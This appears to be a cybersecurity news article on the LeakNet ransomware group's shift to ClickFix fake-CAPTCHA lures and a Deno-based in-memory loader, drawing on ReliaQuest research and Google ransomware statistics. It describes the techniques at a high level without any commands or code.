An advanced ransomware group called LeakNet has recently shifted its tactics by utilizing the ClickFix social engineering method through compromised websites to gain initial access.
This new approach involves tricking users into running malicious commands under the guise of fixing non-existent errors, a departure from traditional methods like using stolen credentials from initial access brokers (IABs), as revealed in a technical report by ReliaQuest.
Another notable aspect of these attacks is the use of a staged command-and-control (C2) loader based on the Deno JavaScript runtime to execute malicious payloads directly in system memory.
According to the cybersecurity company, the consistent post-exploitation sequence observed in these attacks provides defenders with identifiable behaviors to detect and disrupt at each stage before the deployment of ransomware, regardless of the initial entry point.
LeakNet, which emerged in November 2024, has positioned itself as a “digital watchdog” advocating for internet freedom and transparency, while also targeting industrial entities, according to data from Dragos.
The adoption of ClickFix by LeakNet offers several advantages, including reduced reliance on third-party suppliers, lower acquisition costs per victim, and elimination of operational delays associated with waiting for valuable accounts to become available.
In these attacks, compromised legitimate websites prompt users to perform fake CAPTCHA verification checks instructing them to run a “msiexec.exe” command in the Windows Run dialog. The attacks are not sector-specific but aim to infect as many victims as possible.
As more threat actors embrace the ClickFix tactic, exploiting trusted workflows to deceive users into running rogue commands via legitimate Windows tools, LeakNet’s adoption of this method represents a significant strategic shift, as noted by ReliaQuest.
By shifting away from IABs, LeakNet overcomes operational constraints, allowing for faster and broader operations. Moreover, the delivery of ClickFix through compromised legitimate websites conceals the attack’s signals at the network level, enhancing stealthiness.
In addition to using ClickFix for initial access, LeakNet is suspected of employing a Deno-based loader to execute Base64-encoded JavaScript in memory to minimize on-disk traces and evade detection. This loader is designed to identify the compromised system, connect to an external server for next-stage malware retrieval, and continually fetch and execute additional code via Deno.
ReliaQuest also documented an intrusion attempt where threat actors utilized Microsoft Teams-based phishing to trick a user into launching a payload chain culminating in a Deno-based loader. This activity, while unattributed, suggests a potential expansion of LeakNet’s initial access methods or adoption of the technique by other threat actors.
Following a consistent pattern, LeakNet’s post-compromise activities involve DLL side-loading to launch a malicious DLL via the loader, lateral movement using PsExec, data exfiltration, and encryption.
For staging and exfiltration, LeakNet leverages S3 buckets, exploiting normal cloud traffic patterns to reduce detection risks.
Google recently identified Qilin (Agenda), Akira (RedBike), Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce (FireFlame and FuryStorm), and Sinobi as the top 10 ransomware brands with the highest number of victims on their data leak platforms.
Google’s Threat Intelligence Group (GTIG) reported that in ransomware incidents, a third involved confirmed or suspected exploitation of vulnerabilities, particularly in common VPNs and firewalls. Additionally, 77% of analyzed ransomware attacks included suspected data theft, indicating a rise from 57% in 2024.
Despite ongoing disruptions in the ransomware landscape, threat actors remain highly motivated, with a shift towards targeting smaller organizations in higher-volume attacks as profitability from larger companies declines.
